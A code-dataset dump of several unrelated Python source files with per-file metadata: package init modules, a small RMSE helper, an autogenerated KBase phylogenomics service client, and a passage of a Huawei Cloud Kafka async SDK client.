common/elasticsearch/elasticsearch_client/__init__.py
KentWangYQ/mongo2es
8952640e8ac3f2b1aa6845082fce04b7c4f7bd1e
[ "Apache-2.0" ]
5
2018-12-24T10:45:56.000Z
2019-07-29T07:26:28.000Z
common/elasticsearch/elasticsearch_client/__init__.py
KentWangYQ/mongo2es
8952640e8ac3f2b1aa6845082fce04b7c4f7bd1e
[ "Apache-2.0" ]
null
null
null
common/elasticsearch/elasticsearch_client/__init__.py
KentWangYQ/mongo2es
8952640e8ac3f2b1aa6845082fce04b7c4f7bd1e
[ "Apache-2.0" ]
2
2019-07-30T06:27:49.000Z
2021-09-24T08:21:52.000Z
# -*- coding: utf-8 -*- __all__ = ['elasticsearch_client', 'elasticsearch_direct_client', 'elasticsearch_2_redis_client', 'elasticsearch_2_kafka_client'] import elasticsearch_client, elasticsearch_direct_client, elasticsearch_2_redis_client, elasticsearch_2_kafka_client
40.571429
116
0.806338
31
284
6.677419
0.354839
0.550725
0.386473
0.36715
0.908213
0.908213
0.908213
0.908213
0.908213
0.908213
0
0.019608
0.102113
284
6
117
47.333333
0.792157
0.073944
0
0
0
0
0.394636
0.318008
0
0
0
0
0
1
0
false
0
0.333333
0
0.333333
0
0
0
0
null
1
1
1
1
1
1
1
1
1
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
11
6f463eaef344a54e68e85b5ee6da693121b5eb02
213
py
Python
hdlConvertorAst/to/hwt/utils.py
mewais/hdlConvertorAst
64c8c1deee923ffae17e70e0fb1ad763cb69608c
[ "MIT" ]
null
null
null
hdlConvertorAst/to/hwt/utils.py
mewais/hdlConvertorAst
64c8c1deee923ffae17e70e0fb1ad763cb69608c
[ "MIT" ]
null
null
null
hdlConvertorAst/to/hwt/utils.py
mewais/hdlConvertorAst
64c8c1deee923ffae17e70e0fb1ad763cb69608c
[ "MIT" ]
null
null
null
from hdlConvertorAst.to.basic_hdl_sim_model.utils import BitsT as bsm_BitsT def BitsT(width, is_signed=False, bits_cls_name="Bits"): return bsm_BitsT(width, is_signed=is_signed, bits_cls_name=bits_cls_name)
35.5
77
0.821596
37
213
4.351351
0.567568
0.149068
0.204969
0.223602
0
0
0
0
0
0
0
0
0.093897
213
5
78
42.6
0.834197
0
0
0
0
0
0.018779
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0.333333
1
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
1
1
0
0
7
6f5761a695dbb09ff41d1f76ee14b9a6c648f0d4
109
py
Python
error.py
Tod80077/Recommendation-System-2.0
85f6f98345f4279c28842c23b2a07aa1340ba561
[ "MIT" ]
null
null
null
error.py
Tod80077/Recommendation-System-2.0
85f6f98345f4279c28842c23b2a07aa1340ba561
[ "MIT" ]
null
null
null
error.py
Tod80077/Recommendation-System-2.0
85f6f98345f4279c28842c23b2a07aa1340ba561
[ "MIT" ]
null
null
null
import numpy as np def rmse(predictions, targets): return np.sqrt(((predictions - targets) ** 2).mean())
27.25
57
0.688073
15
109
5
0.8
0.48
0
0
0
0
0
0
0
0
0
0.01087
0.155963
109
4
57
27.25
0.804348
0
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0.333333
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
1
1
0
0
7
6f6de1614156ef735016d159e753401410cc77b7
28,918
py
Python
lib/kb_phylogenomics/kb_phylogenomicsClient.py
dcchivian/kb_phylogenomics
c63bae0dbe54b6d1e01107476e8f1b425acb11c5
[ "MIT" ]
1
2020-12-04T08:10:37.000Z
2020-12-04T08:10:37.000Z
lib/kb_phylogenomics/kb_phylogenomicsClient.py
dcchivian/kb_phylogenomics
c63bae0dbe54b6d1e01107476e8f1b425acb11c5
[ "MIT" ]
30
2017-03-22T00:19:05.000Z
2020-11-11T05:37:49.000Z
lib/kb_phylogenomics/kb_phylogenomicsClient.py
dcchivian/kb_phylogenomics
c63bae0dbe54b6d1e01107476e8f1b425acb11c5
[ "MIT" ]
11
2017-02-18T00:59:54.000Z
2020-08-20T22:47:38.000Z
# -*- coding: utf-8 -*- ############################################################ # # Autogenerated by the KBase type compiler - # any changes made here will be overwritten # ############################################################ from __future__ import print_function # the following is a hack to get the baseclient to import whether we're in a # package or not. This makes pep8 unhappy hence the annotations. try: # baseclient and this client are in a package from .baseclient import BaseClient as _BaseClient # @UnusedImport except ImportError: # no they aren't from baseclient import BaseClient as _BaseClient # @Reimport class kb_phylogenomics(object): def __init__( self, url=None, timeout=30 * 60, user_id=None, password=None, token=None, ignore_authrc=False, trust_all_ssl_certificates=False, auth_svc='https://ci.kbase.us/services/auth/api/legacy/KBase/Sessions/Login'): if url is None: raise ValueError('A url is required') self._service_ver = None self._client = _BaseClient( url, timeout=timeout, user_id=user_id, password=password, token=token, ignore_authrc=ignore_authrc, trust_all_ssl_certificates=trust_all_ssl_certificates, auth_svc=auth_svc) def build_gene_tree(self, params, context=None): """ :param params: instance of type "build_gene_tree_Input" (build_gene_tree() ** ** build a gene tree for a featureset) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "desc" of String, parameter "input_featureSet_ref" of type "data_obj_ref", parameter "output_tree_name" of type "data_obj_name", parameter "genome_disp_name_config" of String, parameter "skip_trimming" of type "bool", parameter "muscle_maxiters" of Long, parameter "muscle_maxhours" of Double, parameter "gblocks_trim_level" of Long, parameter "gblocks_min_seqs_for_conserved" of Long, parameter "gblocks_min_seqs_for_flank" of Long, parameter "gblocks_max_pos_contig_nonconserved" of Long, parameter "gblocks_min_block_len" of Long, parameter "gblocks_remove_mask_positions_flag" of Long, parameter "fasttree_fastest" of Long, parameter "fasttree_pseudo" of Long, parameter "fasttree_gtr" of Long, parameter "fasttree_wag" of Long, parameter "fasttree_noml" of Long, parameter "fasttree_nome" of Long, parameter "fasttree_cat" of Long, parameter "fasttree_nocat" of Long, parameter "fasttree_gamma" of Long :returns: instance of type "build_gene_tree_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.build_gene_tree', [params], self._service_ver, context) def build_strain_tree(self, params, context=None): """ :param params: instance of type "build_strain_tree_Input" (build_strain_tree() ** ** build a species tree for a collection of strain genomes) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "desc" of String, parameter "input_genome_refs" of type "data_obj_ref", parameter "output_tree_name" of type "data_obj_name", parameter "genome_disp_name_config" of String, parameter "skip_trimming" of type "bool", parameter "muscle_maxiters" of Long, parameter "muscle_maxhours" of Double, parameter "gblocks_trim_level" of Long, parameter "gblocks_min_seqs_for_conserved" of Long, parameter "gblocks_min_seqs_for_flank" of Long, parameter "gblocks_max_pos_contig_nonconserved" of Long, parameter "gblocks_min_block_len" of Long, parameter "gblocks_remove_mask_positions_flag" of Long, parameter "fasttree_fastest" of Long, parameter "fasttree_pseudo" of Long, parameter "fasttree_gtr" of Long, parameter "fasttree_wag" of Long, parameter "fasttree_noml" of Long, parameter "fasttree_nome" of Long, parameter "fasttree_cat" of Long, parameter "fasttree_nocat" of Long, parameter "fasttree_gamma" of Long :returns: instance of type "build_strain_tree_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.build_strain_tree', [params], self._service_ver, context) def build_pangenome_species_tree(self, params, context=None): """ :param params: instance of type "build_pangenome_species_tree_Input" (build_pangenome_species_tree() ** ** build a species tree using the single copy genes from a pangenome) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "desc" of String, parameter "input_pangenome_ref" of type "data_obj_ref", parameter "output_tree_name" of type "data_obj_name", parameter "genome_disp_name_config" of String, parameter "skip_trimming" of type "bool", parameter "perc_marker_presence_min" of Double, parameter "muscle_maxiters" of Long, parameter "muscle_maxhours" of Double, parameter "gblocks_trim_level" of Long, parameter "gblocks_min_seqs_for_conserved" of Long, parameter "gblocks_min_seqs_for_flank" of Long, parameter "gblocks_max_pos_contig_nonconserved" of Long, parameter "gblocks_min_block_len" of Long, parameter "gblocks_remove_mask_positions_flag" of Long, parameter "fasttree_fastest" of Long, parameter "fasttree_pseudo" of Long, parameter "fasttree_gtr" of Long, parameter "fasttree_wag" of Long, parameter "fasttree_noml" of Long, parameter "fasttree_nome" of Long, parameter "fasttree_cat" of Long, parameter "fasttree_nocat" of Long, parameter "fasttree_gamma" of Long :returns: instance of type "build_pangenome_species_tree_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.build_pangenome_species_tree', [params], self._service_ver, context) def view_tree(self, params, context=None): """ :param params: instance of type "view_tree_Input" (view_tree() ** ** show a KBase Tree and make newick and images downloadable) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_tree_ref" of type "data_obj_ref", parameter "desc" of String, parameter "show_skeleton_genome_sci_name" of type "bool", parameter "reference_genome_disp" of mapping from type "data_obj_ref" to mapping from String to String, parameter "skeleton_genome_disp" of mapping from type "data_obj_ref" to mapping from String to String, parameter "user_genome_disp" of mapping from type "data_obj_ref" to mapping from String to String, parameter "user2_genome_disp" of mapping from type "data_obj_ref" to mapping from String to String, parameter "color_for_reference_genomes" of String, parameter "color_for_skeleton_genomes" of String, parameter "color_for_user_genomes" of String, parameter "color_for_user2_genomes" of String, parameter "tree_shape" of String :returns: instance of type "view_tree_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.view_tree', [params], self._service_ver, context) def trim_speciestree_to_genomeset(self, params, context=None): """ :param params: instance of type "trim_speciestree_to_genomeset_Input" (trim_speciestree_to_genomeset() ** ** reduce tree to match genomes found in genomeset) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_genomeSet_ref" of type "data_obj_ref", parameter "input_tree_ref" of type "data_obj_ref", parameter "output_tree_name" of type "data_obj_name", parameter "desc" of String, parameter "show_skeleton_genome_sci_name" of type "bool", parameter "enforce_genome_version_match" of type "bool", parameter "reference_genome_disp" of mapping from type "data_obj_ref" to mapping from String to String, parameter "skeleton_genome_disp" of mapping from type "data_obj_ref" to mapping from String to String, parameter "user_genome_disp" of mapping from type "data_obj_ref" to mapping from String to String, parameter "user2_genome_disp" of mapping from type "data_obj_ref" to mapping from String to String, parameter "color_for_reference_genomes" of String, parameter "color_for_skeleton_genomes" of String, parameter "color_for_user_genomes" of String, parameter "color_for_user2_genomes" of String, parameter "tree_shape" of String :returns: instance of type "trim_speciestree_to_genomeset_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.trim_speciestree_to_genomeset', [params], self._service_ver, context) def build_microbial_speciestree(self, params, context=None): """ :param params: instance of type "build_microbial_speciestree_Input" (build_microbial_speciestree() ** ** run Insert Set of Genomes into Species Tree with extra features) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_genome_refs" of type "data_obj_ref", parameter "input_genome2_refs" of type "data_obj_ref", parameter "output_tree_name" of type "data_obj_name", parameter "desc" of String, parameter "show_skeleton_genome_sci_name" of type "bool", parameter "skeleton_set" of String, parameter "color_for_skeleton_genomes" of String, parameter "color_for_user_genomes" of String, parameter "color_for_user2_genomes" of String :returns: instance of type "build_microbial_speciestree_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.build_microbial_speciestree', [params], self._service_ver, context) def localize_DomainAnnotations(self, params, context=None): """ :param params: instance of type "localize_DomainAnnotations_Input" (localize_DomainAnnotations() ** ** point all DomainAnnotations at local copies of Genome Objects) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_DomainAnnotation_refs" of type "data_obj_ref" :returns: instance of type "localize_DomainAnnotations_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.localize_DomainAnnotations', [params], self._service_ver, context) def run_DomainAnnotation_Sets(self, params, context=None): """ :param params: instance of type "run_DomainAnnotation_Sets_Input" (run_DomainAnnotation_Sets() ** ** run the DomainAnnotation App against a GenomeSet) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_genomeSet_ref" of type "data_obj_ref", parameter "override_annot" of type "bool" :returns: instance of type "run_DomainAnnotation_Sets_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.run_DomainAnnotation_Sets', [params], self._service_ver, context) def view_fxn_profile(self, params, context=None): """ :param params: instance of type "view_fxn_profile_Input" (view_fxn_profile() ** ** show a table/heatmap of general categories or custom gene families for a set of Genomes) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_genomeSet_ref" of type "data_obj_ref", parameter "namespace" of String, parameter "custom_target_fams" of type "CustomTargetFams" (parameter groups) -> structure: parameter "target_fams" of list of String, parameter "extra_target_fam_groups_COG" of list of String, parameter "extra_target_fam_groups_PFAM" of list of String, parameter "extra_target_fam_groups_TIGR" of list of String, parameter "extra_target_fam_groups_SEED" of list of String, parameter "genome_disp_name_config" of String, parameter "count_category" of String, parameter "heatmap" of type "bool", parameter "vertical" of type "bool", parameter "top_hit" of type "bool", parameter "e_value" of Double, parameter "log_base" of Double, parameter "required_COG_annot_perc" of Double, parameter "required_PFAM_annot_perc" of Double, parameter "required_TIGR_annot_perc" of Double, parameter "required_SEED_annot_perc" of Double, parameter "count_hypothetical" of type "bool", parameter "show_blanks" of type "bool", parameter "skip_missing_genomes" of type "bool", parameter "enforce_genome_version_match" of type "bool" :returns: instance of type "view_fxn_profile_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.view_fxn_profile', [params], self._service_ver, context) def view_fxn_profile_featureSet(self, params, context=None): """ :param params: instance of type "view_fxn_profile_featureSet_Input" (view_fxn_profile_featureSet() ** ** show a table/heatmap of general categories or custom gene families for a set of Genomes) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_featureSet_ref" of type "data_obj_ref", parameter "namespace" of String, parameter "custom_target_fams" of type "CustomTargetFams" (parameter groups) -> structure: parameter "target_fams" of list of String, parameter "extra_target_fam_groups_COG" of list of String, parameter "extra_target_fam_groups_PFAM" of list of String, parameter "extra_target_fam_groups_TIGR" of list of String, parameter "extra_target_fam_groups_SEED" of list of String, parameter "genome_disp_name_config" of String, parameter "count_category" of String, parameter "heatmap" of type "bool", parameter "vertical" of type "bool", parameter "top_hit" of type "bool", parameter "e_value" of Double, parameter "log_base" of Double, parameter "required_COG_annot_perc" of Double, parameter "required_PFAM_annot_perc" of Double, parameter "required_TIGR_annot_perc" of Double, parameter "required_SEED_annot_perc" of Double, parameter "count_hypothetical" of type "bool", parameter "show_blanks" of type "bool", parameter "skip_missing_genomes" of type "bool", parameter "enforce_genome_version_match" of type "bool" :returns: instance of type "view_fxn_profile_featureSet_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.view_fxn_profile_featureSet', [params], self._service_ver, context) def view_fxn_profile_phylo(self, params, context=None): """ :param params: instance of type "view_fxn_profile_phylo_Input" (view_fxn_profile_phylo() ** ** show a table/heatmap of general categories or custom gene families for a set of Genomes using the species tree) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_speciesTree_ref" of type "data_obj_ref", parameter "namespace" of String, parameter "custom_target_fams" of type "CustomTargetFams" (parameter groups) -> structure: parameter "target_fams" of list of String, parameter "extra_target_fam_groups_COG" of list of String, parameter "extra_target_fam_groups_PFAM" of list of String, parameter "extra_target_fam_groups_TIGR" of list of String, parameter "extra_target_fam_groups_SEED" of list of String, parameter "genome_disp_name_config" of String, parameter "count_category" of String, parameter "heatmap" of type "bool", parameter "vertical" of type "bool", parameter "top_hit" of type "bool", parameter "e_value" of Double, parameter "log_base" of Double, parameter "required_COG_annot_perc" of Double, parameter "required_PFAM_annot_perc" of Double, parameter "required_TIGR_annot_perc" of Double, parameter "required_SEED_annot_perc" of Double, parameter "count_hypothetical" of type "bool", parameter "show_blanks" of type "bool", parameter "skip_missing_genomes" of type "bool", parameter "enforce_genome_version_match" of type "bool" :returns: instance of type "view_fxn_profile_phylo_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.view_fxn_profile_phylo', [params], self._service_ver, context) def view_genome_circle_plot(self, params, context=None): """ :param params: instance of type "view_genome_circle_plot_Input" (view_genome_circle_plot() ** ** build a circle plot of a microbial genome) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_genome_ref" of type "data_obj_ref" :returns: instance of type "view_genome_circle_plot_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.view_genome_circle_plot', [params], self._service_ver, context) def view_pan_circle_plot(self, params, context=None): """ :param params: instance of type "view_pan_circle_plot_Input" (view_pan_circle_plot() ** ** build a circle plot of a microbial genome with its pangenome members) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_genome_ref" of type "data_obj_ref", parameter "input_pangenome_ref" of type "data_obj_ref", parameter "input_compare_genome_refs" of type "data_obj_ref", parameter "input_outgroup_genome_refs" of type "data_obj_ref", parameter "save_featuresets" of type "bool", parameter "genome_disp_name_config" of String :returns: instance of type "view_pan_circle_plot_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.view_pan_circle_plot', [params], self._service_ver, context) def view_pan_accumulation_plot(self, params, context=None): """ :param params: instance of type "view_pan_accumulation_plot_Input" (view_pan_accumulation_plot() ** ** build an accumulation plot of a pangenome) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_genome_ref" of type "data_obj_ref", parameter "input_pangenome_ref" of type "data_obj_ref" :returns: instance of type "view_pan_accumulation_plot_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.view_pan_accumulation_plot', [params], self._service_ver, context) def view_pan_flower_venn(self, params, context=None): """ :param params: instance of type "view_pan_flower_venn_Input" (view_pan_flower_venn() ** ** build a multi-member pangenome flower venn diagram) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_genome_ref" of type "data_obj_ref", parameter "input_pangenome_ref" of type "data_obj_ref" :returns: instance of type "view_pan_flower_venn_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.view_pan_flower_venn', [params], self._service_ver, context) def view_pan_pairwise_overlap(self, params, context=None): """ :param params: instance of type "view_pan_pairwise_overlap_Input" (view_pan_pairwise_overlap() ** ** build a multi-member pangenome pairwise overlap plot) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_genome_ref" of type "data_obj_ref", parameter "input_pangenome_ref" of type "data_obj_ref" :returns: instance of type "view_pan_pairwise_overlap_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.view_pan_pairwise_overlap', [params], self._service_ver, context) def view_pan_phylo(self, params, context=None): """ :param params: instance of type "view_pan_phylo_Input" (view_pan_phylo() ** ** show the pangenome accumulation using a tree) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_pangenome_ref" of type "data_obj_ref", parameter "input_speciesTree_ref" of type "data_obj_ref", parameter "save_featuresets" of type "bool", parameter "skip_missing_genomes" of type "bool", parameter "enforce_genome_version_match" of type "bool", parameter "genome_disp_name_config" of String :returns: instance of type "view_pan_phylo_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.view_pan_phylo', [params], self._service_ver, context) def find_homologs_with_genome_context(self, params, context=None): """ :param params: instance of type "find_homologs_with_genome_context_Input" (find_homologs_with_genome_context() ** ** show homolgous genes across multiple genomes within genome context against species tree) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_featureSet_ref" of type "data_obj_ref", parameter "input_speciesTree_ref" of type "data_obj_ref", parameter "save_per_genome_featureSets" of type "bool", parameter "neighbor_thresh" of Long, parameter "ident_thresh" of Double, parameter "overlap_fraction" of Double, parameter "e_value" of Double, parameter "bitscore" of Double, parameter "color_seed" of Double :returns: instance of type "find_homologs_with_genome_context_Output" -> structure: parameter "report_name" of String, parameter "report_ref" of String """ return self._client.call_method('kb_phylogenomics.find_homologs_with_genome_context', [params], self._service_ver, context) def get_configure_categories(self, params, context=None): """ :param params: instance of type "get_configure_categories_Input" (get_configure_categories() ** ** configure the domain categorie names and descriptions) -> structure: parameter "params" of type "view_fxn_profile_Input" (view_fxn_profile() ** ** show a table/heatmap of general categories or custom gene families for a set of Genomes) -> structure: parameter "workspace_name" of type "workspace_name" (** Common types), parameter "input_genomeSet_ref" of type "data_obj_ref", parameter "namespace" of String, parameter "custom_target_fams" of type "CustomTargetFams" (parameter groups) -> structure: parameter "target_fams" of list of String, parameter "extra_target_fam_groups_COG" of list of String, parameter "extra_target_fam_groups_PFAM" of list of String, parameter "extra_target_fam_groups_TIGR" of list of String, parameter "extra_target_fam_groups_SEED" of list of String, parameter "genome_disp_name_config" of String, parameter "count_category" of String, parameter "heatmap" of type "bool", parameter "vertical" of type "bool", parameter "top_hit" of type "bool", parameter "e_value" of Double, parameter "log_base" of Double, parameter "required_COG_annot_perc" of Double, parameter "required_PFAM_annot_perc" of Double, parameter "required_TIGR_annot_perc" of Double, parameter "required_SEED_annot_perc" of Double, parameter "count_hypothetical" of type "bool", parameter "show_blanks" of type "bool", parameter "skip_missing_genomes" of type "bool", parameter "enforce_genome_version_match" of type "bool" :returns: instance of type "get_configure_categories_Output" -> structure: parameter "cats" of list of String, parameter "cat2name" of type "Cat2Name" (category to name) -> structure: parameter "namespace" of type "domain_source" (COG, PF, TIGR, SEED), parameter "cat" of type "category" (Categories), parameter "cat2group" of type "Cat2Group" (category to group) -> structure: parameter "namespace" of type "domain_source" (COG, PF, TIGR, SEED), parameter "cat" of type "category" (Categories), parameter "domfam2cat" of type "DomFam2Cat" (domain family to category) -> structure: parameter "namespace" of type "domain_source" (COG, PF, TIGR, SEED), parameter "domfam" of type "domainfamily" (Domains), parameter "cat2domfams" of type "Cat2DomFams" (category to domain family) -> structure: parameter "namespace" of type "domain_source" (COG, PF, TIGR, SEED), parameter "cat" of type "category" (Categories) """ return self._client.call_method('kb_phylogenomics.get_configure_categories', [params], self._service_ver, context) def status(self, context=None): return self._client.call_method('kb_phylogenomics.status', [], self._service_ver, context)
59.258197
93
0.658794
3,400
28,918
5.302059
0.086471
0.049592
0.066955
0.028735
0.856604
0.840628
0.81683
0.787929
0.774949
0.748045
0
0.000934
0.259631
28,918
487
94
59.379877
0.841056
0.704509
0
0.240506
1
0.012658
0.156726
0.141677
0
0
0
0
0
1
0.265823
false
0.025316
0.050633
0.012658
0.582278
0.012658
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
9
48f02c18873c94098ec234cdc39ca3c8cf0a5833
227
py
Python
networkx/utils/__init__.py
tempcyc/networkx
cae83ba501c242567cb2454f97f851898276f06e
[ "BSD-3-Clause" ]
1
2015-07-16T01:36:44.000Z
2015-07-16T01:36:44.000Z
networkx/utils/__init__.py
tempcyc/networkx
cae83ba501c242567cb2454f97f851898276f06e
[ "BSD-3-Clause" ]
null
null
null
networkx/utils/__init__.py
tempcyc/networkx
cae83ba501c242567cb2454f97f851898276f06e
[ "BSD-3-Clause" ]
null
null
null
from networkx.utils.misc import * from networkx.utils.decorators import * from networkx.utils.random_sequence import * from networkx.utils.union_find import * from networkx.utils.rcm import * from networkx.utils.heaps import *
32.428571
44
0.814978
32
227
5.71875
0.375
0.393443
0.557377
0.628415
0
0
0
0
0
0
0
0
0.105727
227
6
45
37.833333
0.901478
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
48fcc42563a62ca0cd351541f69ea744d9c75e29
109,256
py
Python
huaweicloud-sdk-kafka/huaweicloudsdkkafka/v2/kafka_async_client.py
wuchen-huawei/huaweicloud-sdk-python-v3
3683d703f4320edb2b8516f36f16d485cff08fc2
[ "Apache-2.0" ]
1
2021-11-03T07:54:50.000Z
2021-11-03T07:54:50.000Z
huaweicloud-sdk-kafka/huaweicloudsdkkafka/v2/kafka_async_client.py
wuchen-huawei/huaweicloud-sdk-python-v3
3683d703f4320edb2b8516f36f16d485cff08fc2
[ "Apache-2.0" ]
null
null
null
huaweicloud-sdk-kafka/huaweicloudsdkkafka/v2/kafka_async_client.py
wuchen-huawei/huaweicloud-sdk-python-v3
3683d703f4320edb2b8516f36f16d485cff08fc2
[ "Apache-2.0" ]
null
null
null
# coding: utf-8 from __future__ import absolute_import import datetime import re import importlib import six from huaweicloudsdkcore.client import Client, ClientBuilder from huaweicloudsdkcore.exceptions import exceptions from huaweicloudsdkcore.utils import http_utils from huaweicloudsdkcore.sdk_stream_request import SdkStreamRequest class KafkaAsyncClient(Client): """ :param configuration: .Configuration object for this client :param pool_threads: The number of threads to use for async requests to the API. More threads means more concurrent API requests. """ PRIMITIVE_TYPES = (float, bool, bytes, six.text_type) + six.integer_types NATIVE_TYPES_MAPPING = { 'int': int, 'long': int if six.PY3 else long, 'float': float, 'str': str, 'bool': bool, 'date': datetime.date, 'datetime': datetime.datetime, 'object': object, } def __init__(self): super(KafkaAsyncClient, self).__init__() self.model_package = importlib.import_module("huaweicloudsdkkafka.v2.model") self.preset_headers = {'User-Agent': 'HuaweiCloud-SDK-Python'} @classmethod def new_builder(cls, clazz=None): if clazz is None: return ClientBuilder(cls) if clazz.__name__ != "KafkaClient": raise TypeError("client type error, support client type is KafkaClient") return ClientBuilder(clazz) def batch_create_or_delete_kafka_tag_async(self, request): """批量添加或删除实例标签 批量添加或删除实例标签。 :param BatchCreateOrDeleteKafkaTagRequest request :return: BatchCreateOrDeleteKafkaTagResponse """ return self.batch_create_or_delete_kafka_tag_with_http_info(request) def batch_create_or_delete_kafka_tag_with_http_info(self, request): """批量添加或删除实例标签 批量添加或删除实例标签。 :param BatchCreateOrDeleteKafkaTagRequest request :return: BatchCreateOrDeleteKafkaTagResponse """ all_params = ['instance_id', 'batch_create_or_delete_kafka_tag_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/kafka/{instance_id}/tags/action', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='BatchCreateOrDeleteKafkaTagResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def batch_delete_instance_topic_async(self, request): """Kafka实例批量删除Topic 该接口用于向Kafka实例批量删除Topic。 :param BatchDeleteInstanceTopicRequest request :return: BatchDeleteInstanceTopicResponse """ return self.batch_delete_instance_topic_with_http_info(request) def batch_delete_instance_topic_with_http_info(self, request): """Kafka实例批量删除Topic 该接口用于向Kafka实例批量删除Topic。 :param BatchDeleteInstanceTopicRequest request :return: BatchDeleteInstanceTopicResponse """ all_params = ['instance_id', 'batch_delete_instance_topic_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/topics/delete', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='BatchDeleteInstanceTopicResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def batch_delete_instance_users_async(self, request): """批量删除用户 批量删除Kafka实例的用户 :param BatchDeleteInstanceUsersRequest request :return: BatchDeleteInstanceUsersResponse """ return self.batch_delete_instance_users_with_http_info(request) def batch_delete_instance_users_with_http_info(self, request): """批量删除用户 批量删除Kafka实例的用户 :param BatchDeleteInstanceUsersRequest request :return: BatchDeleteInstanceUsersResponse """ all_params = ['instance_id', 'batch_delete_instance_users_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/users', method='PUT', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='BatchDeleteInstanceUsersResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, 